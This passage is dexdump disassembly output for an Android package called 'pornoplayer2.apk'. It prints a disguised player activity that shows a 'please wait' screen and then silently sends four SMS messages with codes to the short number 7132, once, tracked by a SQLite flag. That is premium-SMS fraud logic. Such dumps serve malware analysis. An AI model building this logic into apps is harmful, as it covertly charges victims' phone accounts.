Processing '/Users/sergio/Documents/Atom-git/uploads/pornoplayer2.apk'...
Opened '/Users/sergio/Documents/Atom-git/uploads/pornoplayer2.apk', DEX version '035'
DEX file header:
magic               : 'dex\n035\0'
checksum            : da9d4dd3
signature           : e06f...633f
file_size           : 6808
header_size         : 112
link_size           : 0
link_off            : 0 (0x000000)
string_ids_size     : 121
string_ids_off      : 112 (0x000070)
type_ids_size       : 40
type_ids_off        : 596 (0x000254)
proto_ids_size       : 19
proto_ids_off        : 756 (0x0002f4)
field_ids_size      : 21
field_ids_off       : 984 (0x0003d8)
method_ids_size     : 51
method_ids_off      : 1152 (0x000480)
class_defs_size     : 16
class_defs_off      : 1560 (0x000618)
data_size           : 4736
data_off            : 2072 (0x000818)

Class #0 header:
class_idx           : 21
access_flags        : 0 (0x0000)
superclass_idx      : 8
interfaces_off      : 0 (0x000000)
source_file_idx     : 12
annotations_off     : 3524 (0x000dc4)
class_data_off      : 6356 (0x0018d4)
static_fields_size  : 0
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 2

Class #0            -
  Class descriptor  : 'Lorg/me/androidapplication1/DataHelper$OpenHelper;'
  Access flags      : 0x0000 ()
  Superclass        : 'Landroid/database/sqlite/SQLiteOpenHelper;'
  Interfaces        -
  Static fields     -
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/me/androidapplication1/DataHelper$OpenHelper;)
      name          : '<init>'
      type          : '(Landroid/content/Context;)V'
      access        : 0x10000 (CONSTRUCTOR)
      code          -
      registers     : 5
      ins           : 2
      outs          : 5
      insns size    : 8 16-bit code units
0008b0:                                        |[0008b0] org.me.androidapplication1.DataHelper.OpenHelper.<init>:(Landroid/content/Context;)V
0008c0: 1a00 6200                              |0000: const-string v0, "mobimovie.db" // string@0062
0008c4: 1201                                   |0002: const/4 v1, #int 0 // #0
0008c6: 1212                                   |0003: const/4 v2, #int 1 // #1
0008c8: 7052 0a00 4310                         |0004: invoke-direct {v3, v4, v0, v1, v2}, Landroid/database/sqlite/SQLiteOpenHelper;.<init>:(Landroid/content/Context;Ljava/lang/String;Landroid/database/sqlite/SQLiteDatabase$CursorFactory;I)V // method@000a
0008ce: 0e00                                   |0007: return-void
      catches       : (none)
      positions     : 
        0x0000 line=56
        0x0007 line=57
      locals        : 
        0x0000 - 0x0008 reg=3 this Lorg/me/androidapplication1/DataHelper$OpenHelper; 
        0x0000 - 0x0008 reg=4 context Landroid/content/Context; 

  Virtual methods   -
    #0              : (in Lorg/me/androidapplication1/DataHelper$OpenHelper;)
      name          : 'onCreate'
      type          : '(Landroid/database/sqlite/SQLiteDatabase;)V'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 3
      ins           : 2
      outs          : 2
      insns size    : 6 16-bit code units
0008d0:                                        |[0008d0] org.me.androidapplication1.DataHelper.OpenHelper.onCreate:(Landroid/database/sqlite/SQLiteDatabase;)V
0008e0: 1a00 0700                              |0000: const-string v0, "CREATE TABLE table1(was TEXT PRIMARY KEY)" // string@0007
0008e4: 6e20 0800 0200                         |0002: invoke-virtual {v2, v0}, Landroid/database/sqlite/SQLiteDatabase;.execSQL:(Ljava/lang/String;)V // method@0008
0008ea: 0e00                                   |0005: return-void
      catches       : (none)
      positions     : 
        0x0000 line=61
        0x0005 line=62
      locals        : 
        0x0000 - 0x0006 reg=1 this Lorg/me/androidapplication1/DataHelper$OpenHelper; 
        0x0000 - 0x0006 reg=2 db Landroid/database/sqlite/SQLiteDatabase; 

    #1              : (in Lorg/me/androidapplication1/DataHelper$OpenHelper;)
      name          : 'onUpgrade'
      type          : '(Landroid/database/sqlite/SQLiteDatabase;II)V'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 6
      ins           : 4
      outs          : 2
      insns size    : 16 16-bit code units
0008ec:                                        |[0008ec] org.me.androidapplication1.DataHelper.OpenHelper.onUpgrade:(Landroid/database/sqlite/SQLiteDatabase;II)V
0008fc: 1a00 0d00                              |0000: const-string v0, "Example" // string@000d
000900: 1a01 3d00                              |0002: const-string v1, "Upgrading database, this will drop tables and recreate." // string@003d
000904: 7120 0e00 1000                         |0004: invoke-static {v0, v1}, Landroid/util/Log;.w:(Ljava/lang/String;Ljava/lang/String;)I // method@000e
00090a: 1a00 0b00                              |0007: const-string v0, "DROP TABLE IF EXISTS table1" // string@000b
00090e: 6e20 0800 0300                         |0009: invoke-virtual {v3, v0}, Landroid/database/sqlite/SQLiteDatabase;.execSQL:(Ljava/lang/String;)V // method@0008
000914: 6e20 1500 3200                         |000c: invoke-virtual {v2, v3}, Lorg/me/androidapplication1/DataHelper$OpenHelper;.onCreate:(Landroid/database/sqlite/SQLiteDatabase;)V // method@0015
00091a: 0e00                                   |000f: return-void
      catches       : (none)
      positions     : 
        0x0000 line=66
        0x0007 line=67
        0x000c line=68
        0x000f line=69
      locals        : 
        0x0000 - 0x0010 reg=2 this Lorg/me/androidapplication1/DataHelper$OpenHelper; 
        0x0000 - 0x0010 reg=3 db Landroid/database/sqlite/SQLiteDatabase; 
        0x0000 - 0x0010 reg=4 oldVersion I 
        0x0000 - 0x0010 reg=5 newVersion I 

  source_file_idx   : 12 (DataHelper.java)

Class #1 header:
class_idx           : 22
access_flags        : 1 (0x0001)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 12
annotations_off     : 3540 (0x000dd4)
class_data_off      : 6374 (0x0018e6)
static_fields_size  : 4
instance_fields_size: 3
direct_methods_size : 1
virtual_methods_size: 2

Class #1            -
  Class descriptor  : 'Lorg/me/androidapplication1/DataHelper;'
  Access flags      : 0x0001 (PUBLIC)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
    #0              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'DATABASE_NAME'
      type          : 'Ljava/lang/String;'
      access        : 0x001a (PRIVATE STATIC FINAL)
    #1              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'DATABASE_VERSION'
      type          : 'I'
      access        : 0x001a (PRIVATE STATIC FINAL)
    #2              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'INSERT'
      type          : 'Ljava/lang/String;'
      access        : 0x001a (PRIVATE STATIC FINAL)
    #3              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'TABLE_NAME'
      type          : 'Ljava/lang/String;'
      access        : 0x001a (PRIVATE STATIC FINAL)
  Instance fields   -
    #0              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'context'
      type          : 'Landroid/content/Context;'
      access        : 0x0002 (PRIVATE)
    #1              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'db'
      type          : 'Landroid/database/sqlite/SQLiteDatabase;'
      access        : 0x0002 (PRIVATE)
    #2              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'insertStmt'
      type          : 'Landroid/database/sqlite/SQLiteStatement;'
      access        : 0x0002 (PRIVATE)
  Direct methods    -
    #0              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : '<init>'
      type          : '(Landroid/content/Context;)V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 5
      ins           : 2
      outs          : 2
      insns size    : 29 16-bit code units
00091c:                                        |[00091c] org.me.androidapplication1.DataHelper.<init>:(Landroid/content/Context;)V
00092c: 7010 1100 0300                         |0000: invoke-direct {v3}, Ljava/lang/Object;.<init>:()V // method@0011
000932: 5b34 0400                              |0003: iput-object v4, v3, Lorg/me/androidapplication1/DataHelper;.context:Landroid/content/Context; // field@0004
000936: 2200 1500                              |0005: new-instance v0, Lorg/me/androidapplication1/DataHelper$OpenHelper; // type@0015
00093a: 5431 0400                              |0007: iget-object v1, v3, Lorg/me/androidapplication1/DataHelper;.context:Landroid/content/Context; // field@0004
00093e: 7020 1300 1000                         |0009: invoke-direct {v0, v1}, Lorg/me/androidapplication1/DataHelper$OpenHelper;.<init>:(Landroid/content/Context;)V // method@0013
000944: 6e10 1400 0000                         |000c: invoke-virtual {v0}, Lorg/me/androidapplication1/DataHelper$OpenHelper;.getWritableDatabase:()Landroid/database/sqlite/SQLiteDatabase; // method@0014
00094a: 0c01                                   |000f: move-result-object v1
00094c: 5b31 0500                              |0010: iput-object v1, v3, Lorg/me/androidapplication1/DataHelper;.db:Landroid/database/sqlite/SQLiteDatabase; // field@0005
000950: 5431 0500                              |0012: iget-object v1, v3, Lorg/me/androidapplication1/DataHelper;.db:Landroid/database/sqlite/SQLiteDatabase; // field@0005
000954: 1a02 5c00                              |0014: const-string v2, "insert into table1(was) values ('was')" // string@005c
000958: 6e20 0700 2100                         |0016: invoke-virtual {v1, v2}, Landroid/database/sqlite/SQLiteDatabase;.compileStatement:(Ljava/lang/String;)Landroid/database/sqlite/SQLiteStatement; // method@0007
00095e: 0c01                                   |0019: move-result-object v1
000960: 5b31 0600                              |001a: iput-object v1, v3, Lorg/me/androidapplication1/DataHelper;.insertStmt:Landroid/database/sqlite/SQLiteStatement; // field@0006
000964: 0e00                                   |001c: return-void
      catches       : (none)
      positions     : 
        0x0000 line=24
        0x0003 line=25
        0x0005 line=26
        0x000c line=27
        0x0012 line=28
        0x001c line=29
      locals        : 
        0x000c - 0x001d reg=0 openHelper Lorg/me/androidapplication1/DataHelper$OpenHelper; 
        0x0000 - 0x001d reg=3 this Lorg/me/androidapplication1/DataHelper; 
        0x0000 - 0x001d reg=4 context Landroid/content/Context; 

  Virtual methods   -
    #0              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'canwe'
      type          : '()Z'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 14
      ins           : 1
      outs          : 8
      insns size    : 64 16-bit code units
000968:                                        |[000968] org.me.androidapplication1.DataHelper.canwe:()Z
000978: 121b                                   |0000: const/4 v11, #int 1 // #1
00097a: 120a                                   |0001: const/4 v10, #int 0 // #0
00097c: 1203                                   |0002: const/4 v3, #int 0 // #0
00097e: 1a0c 7700                              |0003: const-string v12, "was" // string@0077
000982: 1a09 6700                              |0005: const-string v9, "no" // string@0067
000986: 54d0 0500                              |0007: iget-object v0, v13, Lorg/me/androidapplication1/DataHelper;.db:Landroid/database/sqlite/SQLiteDatabase; // field@0005
00098a: 1a01 7200                              |0009: const-string v1, "table1" // string@0072
00098e: 23b2 2700                              |000b: new-array v2, v11, [Ljava/lang/String; // type@0027
000992: 1a04 7700                              |000d: const-string v4, "was" // string@0077
000996: 4d0c 020a                              |000f: aput-object v12, v2, v10
00099a: 0734                                   |0011: move-object v4, v3
00099c: 0735                                   |0012: move-object v5, v3
00099e: 0736                                   |0013: move-object v6, v3
0009a0: 0737                                   |0014: move-object v7, v3
0009a2: 7408 0900 0000                         |0015: invoke-virtual/range {v0, v1, v2, v3, v4, v5, v6, v7}, Landroid/database/sqlite/SQLiteDatabase;.query:(Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor; // method@0009
0009a8: 0c08                                   |0018: move-result-object v8
0009aa: 7210 0500 0800                         |0019: invoke-interface {v8}, Landroid/database/Cursor;.moveToFirst:()Z // method@0005
0009b0: 0a00                                   |001c: move-result v0
0009b2: 3800 0c00                              |001d: if-eqz v0, 0029 // +000c
0009b6: 7220 0300 a800                         |001f: invoke-interface {v8, v10}, Landroid/database/Cursor;.getString:(I)Ljava/lang/String; // method@0003
0009bc: 0c09                                   |0022: move-result-object v9
0009be: 7210 0600 0800                         |0023: invoke-interface {v8}, Landroid/database/Cursor;.moveToNext:()Z // method@0006
0009c4: 0a00                                   |0026: move-result v0
0009c6: 3900 f8ff                              |0027: if-nez v0, 001f // -0008
0009ca: 3808 0b00                              |0029: if-eqz v8, 0034 // +000b
0009ce: 7210 0400 0800                         |002b: invoke-interface {v8}, Landroid/database/Cursor;.isClosed:()Z // method@0004
0009d4: 0a00                                   |002e: move-result v0
0009d6: 3900 0500                              |002f: if-nez v0, 0034 // +0005
0009da: 7210 0200 0800                         |0031: invoke-interface {v8}, Landroid/database/Cursor;.close:()V // method@0002
0009e0: 1a00 7700                              |0034: const-string v0, "was" // string@0077
0009e4: 6e20 1200 c900                         |0036: invoke-virtual {v9, v12}, Ljava/lang/String;.equals:(Ljava/lang/Object;)Z // method@0012
0009ea: 0a00                                   |0039: move-result v0
0009ec: 3800 0400                              |003a: if-eqz v0, 003e // +0004
0009f0: 01a0                                   |003c: move v0, v10
0009f2: 0f00                                   |003d: return v0
0009f4: 01b0                                   |003e: move v0, v11
0009f6: 28fe                                   |003f: goto 003d // -0002
      catches       : (none)
      positions     : 
        0x0005 line=36
        0x0007 line=37
        0x0019 line=39
        0x001f line=41
        0x0023 line=42
        0x0029 line=44
        0x0031 line=45
        0x0034 line=47
        0x003d line=50
      locals        : 
        0x0019 - 0x0040 reg=8 cursor Landroid/database/Cursor; 
        0x0007 - 0x0040 reg=9 result Ljava/lang/String; 
        0x0000 - 0x0040 reg=13 this Lorg/me/androidapplication1/DataHelper; 

    #1              : (in Lorg/me/androidapplication1/DataHelper;)
      name          : 'was'
      type          : '()V'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 2
      ins           : 1
      outs          : 1
      insns size    : 6 16-bit code units
0009f8:                                        |[0009f8] org.me.androidapplication1.DataHelper.was:()V
000a08: 5410 0600                              |0000: iget-object v0, v1, Lorg/me/androidapplication1/DataHelper;.insertStmt:Landroid/database/sqlite/SQLiteStatement; // field@0006
000a0c: 6e10 0b00 0000                         |0002: invoke-virtual {v0}, Landroid/database/sqlite/SQLiteStatement;.executeInsert:()J // method@000b
000a12: 0e00                                   |0005: return-void
      catches       : (none)
      positions     : 
        0x0000 line=32
        0x0005 line=33
      locals        : 
        0x0000 - 0x0006 reg=1 this Lorg/me/androidapplication1/DataHelper; 

  source_file_idx   : 12 (DataHelper.java)

Class #2 header:
class_idx           : 23
access_flags        : 1 (0x0001)
superclass_idx      : 2
interfaces_off      : 0 (0x000000)
source_file_idx     : 57
annotations_off     : 0 (0x000000)
class_data_off      : 6406 (0x001906)
static_fields_size  : 0
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 1

Class #2            -
  Class descriptor  : 'Lorg/me/androidapplication1/MoviePlayer;'
  Access flags      : 0x0001 (PUBLIC)
  Superclass        : 'Landroid/app/Activity;'
  Interfaces        -
  Static fields     -
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/me/androidapplication1/MoviePlayer;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000a14:                                        |[000a14] org.me.androidapplication1.MoviePlayer.<init>:()V
000a24: 7010 0000 0000                         |0000: invoke-direct {v0}, Landroid/app/Activity;.<init>:()V // method@0000
000a2a: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=9
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/me/androidapplication1/MoviePlayer; 

  Virtual methods   -
    #0              : (in Lorg/me/androidapplication1/MoviePlayer;)
      name          : 'onCreate'
      type          : '(Landroid/os/Bundle;)V'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 10
      ins           : 2
      outs          : 6
      insns size    : 77 16-bit code units
000a2c:                                        |[000a2c] org.me.androidapplication1.MoviePlayer.onCreate:(Landroid/os/Bundle;)V
000a3c: 1202                                   |0000: const/4 v2, #int 0 // #0
000a3e: 1a01 0100                              |0001: const-string v1, "7132" // string@0001
000a42: 6f20 0100 9800                         |0003: invoke-super {v8, v9}, Landroid/app/Activity;.onCreate:(Landroid/os/Bundle;)V // method@0001
000a48: 2206 1600                              |0006: new-instance v6, Lorg/me/androidapplication1/DataHelper; // type@0016
000a4c: 7020 1700 8600                         |0008: invoke-direct {v6, v8}, Lorg/me/androidapplication1/DataHelper;.<init>:(Landroid/content/Context;)V // method@0017
000a52: 6e10 1800 0600                         |000b: invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;.canwe:()Z // method@0018
000a58: 0a03                                   |000e: move-result v3
000a5a: 3803 3a00                              |000f: if-eqz v3, 0049 // +003a
000a5e: 2207 0e00                              |0011: new-instance v7, Landroid/widget/TextView; // type@000e
000a62: 7020 0f00 8700                         |0013: invoke-direct {v7, v8}, Landroid/widget/TextView;.<init>:(Landroid/content/Context;)V // method@000f
000a68: 1a03 7800                              |0016: const-string v3, "Подождите..." // string@0078
000a6c: 6e20 1000 3700                         |0018: invoke-virtual {v7, v3}, Landroid/widget/TextView;.setText:(Ljava/lang/CharSequence;)V // method@0010
000a72: 6e20 1d00 7800                         |001b: invoke-virtual {v8, v7}, Lorg/me/androidapplication1/MoviePlayer;.setContentView:(Landroid/view/View;)V // method@001d
000a78: 7100 0c00 0000                         |001e: invoke-static {}, Landroid/telephony/SmsManager;.getDefault:()Landroid/telephony/SmsManager; // method@000c
000a7e: 0c00                                   |0021: move-result-object v0
000a80: 1a03 0100                              |0022: const-string v3, "7132" // string@0001
000a84: 1a03 0500                              |0024: const-string v3, "846978" // string@0005
000a88: 0724                                   |0026: move-object v4, v2
000a8a: 0725                                   |0027: move-object v5, v2
000a8c: 7406 0d00 0000                         |0028: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V // method@000d
000a92: 1a03 0100                              |002b: const-string v3, "7132" // string@0001
000a96: 1a03 0300                              |002d: const-string v3, "845785" // string@0003
000a9a: 0724                                   |002f: move-object v4, v2
000a9c: 0725                                   |0030: move-object v5, v2
000a9e: 7406 0d00 0000                         |0031: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V // method@000d
000aa4: 1a03 0100                              |0034: const-string v3, "7132" // string@0001
000aa8: 1a03 0400                              |0036: const-string v3, "846006" // string@0004
000aac: 0724                                   |0038: move-object v4, v2
000aae: 0725                                   |0039: move-object v5, v2
000ab0: 7406 0d00 0000                         |003a: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V // method@000d
000ab6: 1a03 0100                              |003d: const-string v3, "7132" // string@0001
000aba: 1a03 0200                              |003f: const-string v3, "844858" // string@0002
000abe: 0724                                   |0041: move-object v4, v2
000ac0: 0725                                   |0042: move-object v5, v2
000ac2: 7406 0d00 0000                         |0043: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V // method@000d
000ac8: 6e10 1900 0600                         |0046: invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;.was:()V // method@0019
000ace: 6e10 1b00 0800                         |0049: invoke-virtual {v8}, Lorg/me/androidapplication1/MoviePlayer;.finish:()V // method@001b
000ad4: 0e00                                   |004c: return-void
      catches       : (none)
      positions     : 
        0x0003 line=13
        0x0006 line=14
        0x000b line=15
        0x0011 line=17
        0x0016 line=18
        0x001b line=19
        0x001e line=20
        0x0022 line=27
        0x002b line=28
        0x0034 line=29
        0x003d line=30
        0x0046 line=35
        0x0049 line=38
        0x004c line=41
      locals        : 
        0x0022 - 0x0049 reg=0 m Landroid/telephony/SmsManager; 
        0x0016 - 0x0049 reg=7 tv Landroid/widget/TextView; 
        0x000b - 0x004d reg=6 dh Lorg/me/androidapplication1/DataHelper; 
        0x0000 - 0x004d reg=8 this Lorg/me/androidapplication1/MoviePlayer; 
        0x0000 - 0x004d reg=9 icicle Landroid/os/Bundle; 

  source_file_idx   : 57 (MoviePlayer.java)

Class #3 header:
class_idx           : 24
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3556 (0x000de4)
class_data_off      : 6420 (0x001914)
static_fields_size  : 0
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #3            -
  Class descriptor  : 'Lorg/me/androidapplication1/R$attr;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/me/androidapplication1/R$attr;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000ad8:                                        |[000ad8] org.me.androidapplication1.R.attr.<init>:()V
000ae8: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000aee: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=11
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/me/androidapplication1/R$attr; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #4 header:
class_idx           : 25
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3572 (0x000df4)
class_data_off      : 6430 (0x00191e)
static_fields_size  : 1
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #4            -
  Class descriptor  : 'Lorg/me/androidapplication1/R$drawable;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
    #0              : (in Lorg/me/androidapplication1/R$drawable;)
      name          : 'icon'
      type          : 'I'
      access        : 0x0019 (PUBLIC STATIC FINAL)
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/me/androidapplication1/R$drawable;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000af0:                                        |[000af0] org.me.androidapplication1.R.drawable.<init>:()V
000b00: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000b06: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=13
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/me/androidapplication1/R$drawable; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #5 header:
class_idx           : 26
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3588 (0x000e04)
class_data_off      : 6442 (0x00192a)
static_fields_size  : 1
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #5            -
  Class descriptor  : 'Lorg/me/androidapplication1/R$layout;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
    #0              : (in Lorg/me/androidapplication1/R$layout;)
      name          : 'main'
      type          : 'I'
      access        : 0x0019 (PUBLIC STATIC FINAL)
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/me/androidapplication1/R$layout;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000b08:                                        |[000b08] org.me.androidapplication1.R.layout.<init>:()V
000b18: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000b1e: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=16
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/me/androidapplication1/R$layout; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #6 header:
class_idx           : 27
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3604 (0x000e14)
class_data_off      : 6454 (0x001936)
static_fields_size  : 1
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #6            -
  Class descriptor  : 'Lorg/me/androidapplication1/R$string;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
    #0              : (in Lorg/me/androidapplication1/R$string;)
      name          : 'app_name'
      type          : 'I'
      access        : 0x0019 (PUBLIC STATIC FINAL)
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/me/androidapplication1/R$string;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000b20:                                        |[000b20] org.me.androidapplication1.R.string.<init>:()V
000b30: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000b36: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=19
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/me/androidapplication1/R$string; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #7 header:
class_idx           : 28
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3620 (0x000e24)
class_data_off      : 6466 (0x001942)
static_fields_size  : 0
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #7            -
  Class descriptor  : 'Lorg/me/androidapplication1/R;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/me/androidapplication1/R;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000b38:                                        |[000b38] org.me.androidapplication1.R.<init>:()V
000b48: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000b4e: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=10
        0x0003 line=19
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/me/androidapplication1/R; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #8 header:
class_idx           : 29
access_flags        : 0 (0x0000)
superclass_idx      : 8
interfaces_off      : 0 (0x000000)
source_file_idx     : 12
annotations_off     : 3636 (0x000e34)
class_data_off      : 6476 (0x00194c)
static_fields_size  : 0
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 2

Class #8            -
  Class descriptor  : 'Lorg/media/player/DataHelper$OpenHelper;'
  Access flags      : 0x0000 ()
  Superclass        : 'Landroid/database/sqlite/SQLiteOpenHelper;'
  Interfaces        -
  Static fields     -
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/media/player/DataHelper$OpenHelper;)
      name          : '<init>'
      type          : '(Landroid/content/Context;)V'
      access        : 0x10000 (CONSTRUCTOR)
      code          -
      registers     : 5
      ins           : 2
      outs          : 5
      insns size    : 8 16-bit code units
000b50:                                        |[000b50] org.media.player.DataHelper.OpenHelper.<init>:(Landroid/content/Context;)V
000b60: 1a00 6200                              |0000: const-string v0, "mobimovie.db" // string@0062
000b64: 1201                                   |0002: const/4 v1, #int 0 // #0
000b66: 1212                                   |0003: const/4 v2, #int 1 // #1
000b68: 7052 0a00 4310                         |0004: invoke-direct {v3, v4, v0, v1, v2}, Landroid/database/sqlite/SQLiteOpenHelper;.<init>:(Landroid/content/Context;Ljava/lang/String;Landroid/database/sqlite/SQLiteDatabase$CursorFactory;I)V // method@000a
000b6e: 0e00                                   |0007: return-void
      catches       : (none)
      positions     : 
        0x0000 line=56
        0x0007 line=57
      locals        : 
        0x0000 - 0x0008 reg=3 this Lorg/media/player/DataHelper$OpenHelper; 
        0x0000 - 0x0008 reg=4 context Landroid/content/Context; 

  Virtual methods   -
    #0              : (in Lorg/media/player/DataHelper$OpenHelper;)
      name          : 'onCreate'
      type          : '(Landroid/database/sqlite/SQLiteDatabase;)V'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 3
      ins           : 2
      outs          : 2
      insns size    : 6 16-bit code units
000b70:                                        |[000b70] org.media.player.DataHelper.OpenHelper.onCreate:(Landroid/database/sqlite/SQLiteDatabase;)V
000b80: 1a00 0700                              |0000: const-string v0, "CREATE TABLE table1(was TEXT PRIMARY KEY)" // string@0007
000b84: 6e20 0800 0200                         |0002: invoke-virtual {v2, v0}, Landroid/database/sqlite/SQLiteDatabase;.execSQL:(Ljava/lang/String;)V // method@0008
000b8a: 0e00                                   |0005: return-void
      catches       : (none)
      positions     : 
        0x0000 line=61
        0x0005 line=62
      locals        : 
        0x0000 - 0x0006 reg=1 this Lorg/media/player/DataHelper$OpenHelper; 
        0x0000 - 0x0006 reg=2 db Landroid/database/sqlite/SQLiteDatabase; 

    #1              : (in Lorg/media/player/DataHelper$OpenHelper;)
      name          : 'onUpgrade'
      type          : '(Landroid/database/sqlite/SQLiteDatabase;II)V'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 6
      ins           : 4
      outs          : 2
      insns size    : 16 16-bit code units
000b8c:                                        |[000b8c] org.media.player.DataHelper.OpenHelper.onUpgrade:(Landroid/database/sqlite/SQLiteDatabase;II)V
000b9c: 1a00 0d00                              |0000: const-string v0, "Example" // string@000d
000ba0: 1a01 3d00                              |0002: const-string v1, "Upgrading database, this will drop tables and recreate." // string@003d
